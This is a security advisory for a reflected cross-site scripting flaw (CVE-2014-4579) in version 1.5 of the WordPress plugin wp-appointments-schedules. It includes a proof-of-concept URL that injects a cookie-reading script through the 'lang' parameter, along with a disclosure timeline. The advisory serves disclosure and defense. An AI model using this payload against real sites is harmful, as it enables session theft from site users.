wp-plugin : wp-appointments-schedules

Plugin Details
Plugin Name: wp-plugin : wp-appointments-schedules
Effected Version : 1.5 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/wp-appointments-schedules/js/test.php?lang=">alert(document.cookie)&

 

Vulnerable Parameter : lang


Disclosure Timeline
Vendor Contacted : 2014-01-17
Plugin Status : Updated on
Public Disclosure : June 12, 2014
CVE Number : CVE-2014-4579
Plugin Description :
[| This wordpress plugin will let you create and manage schedules. You can add, delete, and manage appointments for each schedule. Individual schedules can be displayed on the website and may be enabled to allow online reservations by registered users. To add a schedule to a page add "[[DISPLAYSCHEDULE_PAUL]]" to the post in the page of interest for a schedule created with the name "Paul". ]